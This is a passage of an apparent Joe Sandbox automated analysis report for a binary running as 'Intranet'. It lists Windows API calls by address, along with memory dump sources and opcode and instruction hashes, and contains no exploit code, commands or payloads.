                                                                            • __itow.LIBCMT ref: 004FA6BB
                                                                              • Part of subcall function 004FA90B: SendMessageW.USER32(?,0000113E,00000000,00000000,?,00000000,00000028,00000800,?,00000028,?,?,?,00000000), ref: 004FA976
                                                                            • SendMessageW.USER32(?,0000110A,00000001,?,?,0000110A,00000004,00000000), ref: 004FA724
                                                                            • __itow.LIBCMT ref: 004FA77B
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: 9d2df9333d46d9ec211cf7faac9922a872286b7a0df39f0de50e067ce5c0fc69
                                                                            • Instruction ID: c220c3ab25c8760af1d6ae53df6774d0f4ec94f191d5c83c957a13b0d6bc8987
                                                                            • Opcode Fuzzy Hash: 9d2df9333d46d9ec211cf7faac9922a872286b7a0df39f0de50e067ce5c0fc69
                                                                            • Instruction Fuzzy Hash: 6141B4B4A0030C6BDF11EF51C855FFE7BB9EF44354F40002AFA4593291DB789954C6A6
                                                                            APIs
                                                                            • #23.WSOCK32(00000002,00000002,00000011), ref: 005170BC
                                                                            • #111.WSOCK32(00000000), ref: 005170CC
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00517130
                                                                            • #111.WSOCK32(00000000), ref: 0051713C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #111$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 3577594119-0
                                                                            • Opcode ID: 5187b6225414b2dc666ebaf3a614b76ec95e640e0414e87b557e45a105904cb3
                                                                            • Instruction ID: cf3d8c0b01b7003732faa55706dc5aa9831097ec187d3db8b43c49446b625326
                                                                            • Opcode Fuzzy Hash: 5187b6225414b2dc666ebaf3a614b76ec95e640e0414e87b557e45a105904cb3
                                                                            • Instruction Fuzzy Hash: 6D41C3757402006FE720AF25DC86FAE77E4EB95B18F04845DFA599B3C2DBB89C008B95
                                                                            APIs
                                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00530980), ref: 00516B92
                                                                            • _strlen.LIBCMT ref: 00516BC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID:
                                                                            • API String ID: 4218353326-0
                                                                            • Opcode ID: e75633086a66b92999b8251a909e0db8ce03a5b4db6c835bb6801a80d92e99b5
                                                                            • Instruction ID: 414480b22052154f3c18ffae35590e9d50326d6fd31267f426c1efbdfb44e7ca
                                                                            • Opcode Fuzzy Hash: e75633086a66b92999b8251a909e0db8ce03a5b4db6c835bb6801a80d92e99b5
                                                                            • Instruction Fuzzy Hash: BC411531600108AFD714EB65CD91EFEBBA9FF54318F10815AF91A9B292DB34AD41C794
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0050BEE1
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0050BF07
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0050BF2C
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0050BF58
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: fb6adbdf532e1157eb676d1563064147a2983d81d9e8d8ee2ef6b150cacc62fc
                                                                            • Instruction ID: 99495120b8dd124cb21dfe5ae31bdf97e18ba8526ff833a6189e5b77523fd79c
                                                                            • Opcode Fuzzy Hash: fb6adbdf532e1157eb676d1563064147a2983d81d9e8d8ee2ef6b150cacc62fc
                                                                            • Instruction Fuzzy Hash: AC415B39600A11DFCB11EF15C585A5DBBE1FF99324B08C489E8499B3A2CB78FD02DB95
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00528F03
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: 980da5991dc724ea01904a0bfca724bd9e604165a5513e13f3bdcd9fc9dd88bc
                                                                            • Instruction ID: c3b4374770b134e09ba42cac2d36ca874dafc17dcedaaf2b4c8d8235b06e6dd8
                                                                            • Opcode Fuzzy Hash: 980da5991dc724ea01904a0bfca724bd9e604165a5513e13f3bdcd9fc9dd88bc
                                                                            • Instruction Fuzzy Hash: 1C31E334602229AFEF249A98ED85BB83FA6FF1B310F144901FA11D62E1CF70D954DA51
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?,?,?,?,?,?,?,?,0052C6BC,?,?,?), ref: 0052B1D2
                                                                            • GetWindowRect.USER32(?,?), ref: 0052B248
                                                                            • PtInRect.USER32(?,?,0052C6BC,?,?), ref: 0052B258
                                                                            • MessageBeep.USER32(00000000,?,?,?,?,0052C6BC,?,?,?), ref: 0052B2C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 8672d07e99ef7d528ac571c3d8578b2948e0ebbcb731806eeba513a2d9f9b071
                                                                            • Instruction ID: ab118c53e06ec170971322455b302c8b75b2008ba079705027db1e591ff86c91
                                                                            • Opcode Fuzzy Hash: 8672d07e99ef7d528ac571c3d8578b2948e0ebbcb731806eeba513a2d9f9b071
                                                                            • Instruction Fuzzy Hash: DE419134604229DFEF11CF98E884A9D7BF5FF9A314F1884A5E4189B290D330A845DB50
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00501326
                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00501342
                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001,00000000,?,00000001), ref: 005013A8
                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 005013FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,000BECBC,?,00008000), ref: 00501465
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00501481
                                                                            • PostMessageW.USER32(00000000,00000101,00000000,?,?,00008000), ref: 005014E0
                                                                            • SendInput.USER32(00000001,?,0000001C,000BECBC,?,00008000), ref: 00501532
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004D642B
                                                                            • __isleadbyte_l.LIBCMT ref: 004D6459
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004D6487
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004D64BD
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 0052553F
                                                                              • Part of subcall function 00503B34: GetWindowThreadProcessId.USER32(?,00000000,00000000,?,005055C0), ref: 00503B4E
                                                                              • Part of subcall function 00503B34: GetCurrentThreadId.KERNEL32 ref: 00503B55
                                                                              • Part of subcall function 00503B34: AttachThreadInput.USER32(00000000,?,005055C0), ref: 00503B5C
                                                                            • GetCaretPos.USER32(?), ref: 00525550
                                                                            • ClientToScreen.USER32(00000000,?), ref: 0052558B
                                                                            • GetForegroundWindow.USER32 ref: 00525591
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • GetCursorPos.USER32(?,?,?,?,?,?,?,?,004DBCEC,?,?,?,?,?), ref: 0052CB7A
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004DBCEC,?,?,?,?,?), ref: 0052CB8F
                                                                            • GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,004DBCEC,?,?,?,?,?), ref: 0052CBDC
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004DBCEC,?,?,?), ref: 0052CC16
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            APIs
                                                                            • __setmode.LIBCMT ref: 004C0BE2
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00507E51,?,?,00000000), ref: 004B4041
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00507E51,?,?,00000000,?,?), ref: 004B4065
                                                                            • _fprintf.LIBCMT ref: 004C0C19
                                                                            • OutputDebugStringW.KERNEL32(?), ref: 004F694C
                                                                              • Part of subcall function 004C4CCA: _flsall.LIBCMT ref: 004C4CE3
                                                                            • __setmode.LIBCMT ref: 004C0C4E
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                            • String ID:
                                                                            • API String ID: 521402451-0
                                                                            APIs
                                                                              • Part of subcall function 004F8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004F8D3F
                                                                              • Part of subcall function 004F8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D49
                                                                              • Part of subcall function 004F8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D58
                                                                              • Part of subcall function 004F8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D5F
                                                                              • Part of subcall function 004F8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D75
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004F92C1
                                                                            • _memcmp.LIBCMT ref: 004F92E4
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F931A
                                                                            • HeapFree.KERNEL32(00000000), ref: 004F9321
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                            • String ID:
                                                                            • API String ID: 1592001646-0
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00511E6F
                                                                              • Part of subcall function 00511EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00511F18
                                                                              • Part of subcall function 00511EF9: InternetCloseHandle.WININET(00000000,0000002A,DEADBEEF,00000000), ref: 00511FB5
                                                                            Similarity
                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 1463438336-0
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,00532C4C), ref: 00503F57
                                                                            • GetLastError.KERNEL32 ref: 00503F66
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00503F75
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00532C4C), ref: 00503FD2
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC,00000001), ref: 005263BD
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005263D7
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005263E5
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005263F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: 29a7b5285129bc9be1b00f048cf00f59efe4a012a5ddf104364f85874bd306ce
                                                                            • Instruction ID: df943d3f70e245751619094c78e44c53df2dd1335cf103f0437defb36ce4200d
                                                                            • Opcode Fuzzy Hash: 29a7b5285129bc9be1b00f048cf00f59efe4a012a5ddf104364f85874bd306ce
                                                                            • Instruction Fuzzy Hash: 5411B131305524AFDB04AB25EC55FBA7B99FFA6320F14451DF916CB2D2CBA4AD008B94
                                                                            APIs
                                                                              • Part of subcall function 004FF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004FE46F,?,?,?,004FF262,00000000,000000EF,00000119,?,?), ref: 004FF867
                                                                              • Part of subcall function 004FF858: lstrcpyW.KERNEL32(00000000,?,?,004FE46F,?,?,?,004FF262,00000000,000000EF,00000119,?,?,00000000), ref: 004FF88D
                                                                              • Part of subcall function 004FF858: lstrcmpiW.KERNEL32(00000000,?,004FE46F,?,?,?,004FF262,00000000,000000EF,00000119,?,?), ref: 004FF8BE
                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004FF262,00000000,000000EF,00000119,?,?,00000000), ref: 004FE488
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,004FF262,00000000,000000EF,00000119,?,?,00000000), ref: 004FE4AE
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,004FF262,00000000,000000EF,00000119,?,?,00000000), ref: 004FE4E2
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: 9d026754554718a85aa103c27267de0aaf688d74b462e60034c041f6f9060da9
                                                                            • Instruction ID: 6e8ae6ed71b59a161676419de4ae15cc3deb7253ed88f7d278b04375f48907bb
                                                                            • Opcode Fuzzy Hash: 9d026754554718a85aa103c27267de0aaf688d74b462e60034c041f6f9060da9
                                                                            • Instruction Fuzzy Hash: FD11EE3A200349AFCB20AF65DC05D7A77A8FF45350B40402FFA06CB2A0EB74A840C799
                                                                            APIs
                                                                            • _free.LIBCMT ref: 004D5331
                                                                              • Part of subcall function 004C593C: __FF_MSGBANNER.LIBCMT ref: 004C5953
                                                                              • Part of subcall function 004C593C: __NMSG_WRITE.LIBCMT ref: 004C595A
                                                                              • Part of subcall function 004C593C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000004,?,?,004C1003,?), ref: 004C597F
                                                                            Similarity
                                                                            • API ID: AllocHeap_free
                                                                            • String ID:
                                                                            • API String ID: 1080816511-0
                                                                            • Opcode ID: f10b576fb9595b2f2d2ef6d47192bd9d9f35b6726b3d14cf94b50f28f90dec9c
                                                                            • Instruction ID: a2311b41bfa2ee4cfd1e89f3172ca1a22a8ef168ca63e348333619811c62535c
                                                                            • Opcode Fuzzy Hash: f10b576fb9595b2f2d2ef6d47192bd9d9f35b6726b3d14cf94b50f28f90dec9c
                                                                            • Instruction Fuzzy Hash: AF11E732505B15AFCB642F75AC25B5F3B949F203E4F10492FFC499A3A0DEBC89409798
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 004B5B58
                                                                              • Part of subcall function 004B56F8: _memset.LIBCMT ref: 004B5787
                                                                              • Part of subcall function 004B56F8: _wcscpy.LIBCMT ref: 004B57DB
                                                                              • Part of subcall function 004B56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?,00000080), ref: 004B57EB
                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 004B5BAD
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B5BBC
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?), ref: 004F0D7C
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1378193009-0
                                                                            • Opcode ID: de27a884ee238524d9f295a0271a2764176270e64ea7555fecbfb9a192329d6f
                                                                            • Instruction ID: 54db2e0a34e3c4e3e27937dfded9487a16b4bf54dd81c0011e2e567e9edbff9c
                                                                            • Opcode Fuzzy Hash: de27a884ee238524d9f295a0271a2764176270e64ea7555fecbfb9a192329d6f
                                                                            • Instruction Fuzzy Hash: 7921DA705087889FE7728B648895BFBFBEC9F51308F04048EE79A56282C7782989DB55
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00504385
                                                                            • _memset.LIBCMT ref: 005043A6
                                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 005043F8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00504401
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                            • String ID:
                                                                            • API String ID: 1157408455-0
                                                                            • Opcode ID: f471b8f4f26499aa622ac5a5ad539b3ee70137a57500ae3c722bebf6acdc73cc
                                                                            • Instruction ID: 408211fdb1261b82e102fac36a4b652259f6a2300c88857738231b2efeea3c21
                                                                            • Opcode Fuzzy Hash: f471b8f4f26499aa622ac5a5ad539b3ee70137a57500ae3c722bebf6acdc73cc
                                                                            • Instruction Fuzzy Hash: D211B2B59012287AD7209AA5AC4DFEFBB7CEB44720F00459AF908A72D0D2744E808AA4
                                                                            APIs
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00507E51,?,?,00000000), ref: 004B4041
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00507E51,?,?,00000000,?,?), ref: 004B4065
                                                                            • #52.WSOCK32(?,?,?), ref: 00516A84
                                                                            • #111.WSOCK32(00000000), ref: 00516A8F
                                                                            • _memmove.LIBCMT ref: 00516ABC
                                                                            • #11.WSOCK32(?), ref: 00516AC7
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$#111_memmove
                                                                            • String ID:
                                                                            • API String ID: 70051993-0
                                                                            • Opcode ID: 9f0ea5f8c7f85bbf378580f1b7d8ab0f3104b2da6e330c8b4cb102122c4f8eb6
                                                                            • Instruction ID: dd3915dbca4e080ed4a05ae015c8bbb4fdd09b1b18c9826e32de4fe5f8988249
                                                                            • Opcode Fuzzy Hash: 9f0ea5f8c7f85bbf378580f1b7d8ab0f3104b2da6e330c8b4cb102122c4f8eb6
                                                                            • Instruction Fuzzy Hash: BC118172500109EFCB04FBA5CD56DEEBBB8BF54304B00406AF502A72A2DF34AE04DBA1
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 004A16B4
                                                                            • GetClientRect.USER32(?,?,?,?,?), ref: 004DB93C
                                                                            • GetCursorPos.USER32(?), ref: 004DB946
                                                                            • ScreenToClient.USER32(?,?), ref: 004DB951
                                                                            Similarity
                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 4127811313-0
                                                                            • Opcode ID: 28e10738e8cd81367ba72907591cbe3bfc2e4fde36445f93c17cc465af3e1dd3
                                                                            • Instruction ID: c7cc7b69f69f8de85b876bd0d473ead4537f057ca1d56bb8d100d79324040b5a
                                                                            • Opcode Fuzzy Hash: 28e10738e8cd81367ba72907591cbe3bfc2e4fde36445f93c17cc465af3e1dd3
                                                                            • Instruction Fuzzy Hash: 88112875A00119ABCB00EF98D899DBE77B8FB26301F140456F941E7260C734BA55DBA9
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004F9719
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000,?,000000B0,?,?), ref: 004F972B
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 004F9741
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 004F975C
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: e0cd8dbf27dd231de88d7db23f83b0467dab3e993f6d50d24b76ba7a1e4cf93a
                                                                            • Instruction ID: b445bd075319e5d29afba9b797a4e4e98988fbbc0fe2d0fbbd6206447e458021
                                                                            • Opcode Fuzzy Hash: e0cd8dbf27dd231de88d7db23f83b0467dab3e993f6d50d24b76ba7a1e4cf93a
                                                                            • Instruction Fuzzy Hash: 67114839900218FFEB11EF95C985FAEBBB8FB48710F204096EA00B7290D6716E11DB94
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,004A2004), ref: 004A214F
                                                                            • GetStockObject.GDI32(00000011,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096,?), ref: 004A2163
                                                                            • SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096), ref: 004A216D
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: 60581bf6b8343071d249da525d40391d35bd9bd0e347a2e41bace5e340f0e7f6
                                                                            • Instruction ID: c11bedc233947c1788a7af7355b2ce4a1a48b912b950adeaab684f3bd44348ff
                                                                            • Opcode Fuzzy Hash: 60581bf6b8343071d249da525d40391d35bd9bd0e347a2e41bace5e340f0e7f6
                                                                            • Instruction Fuzzy Hash: C011CBB2101208BFDB024F988C50EEB7B68EF69354F000102FA0452250C7759C60FFA0
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005004EC,?,0050153F,?,00008000), ref: 0050195E
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,005004EC,?,0050153F,?,00008000), ref: 00501983
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005004EC,?,0050153F,?,00008000), ref: 0050198D
                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,005004EC,?,0050153F,?,00008000), ref: 005019C0
                                                                            Memory Dump Source
